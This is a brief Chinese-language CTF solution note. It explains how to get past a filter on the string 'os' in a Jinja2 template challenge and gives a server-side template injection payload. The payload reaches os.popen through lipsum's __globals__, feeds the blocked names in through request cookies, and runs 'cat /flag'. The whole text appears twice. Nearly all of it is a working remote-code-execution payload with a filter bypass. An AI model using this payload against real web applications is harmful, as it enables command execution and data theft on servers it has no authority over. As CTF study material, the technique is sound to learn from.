EXP
这道题ban了“os”,可以使用get方法加上request传参解决
payload
?name={{(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}cookies
a=__globals__;b=os;c=cat /flag这道题ban了“os”,可以使用get方法加上request传参解决
payload
?name={{(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}cookies
a=__globals__;b=os;c=cat /flag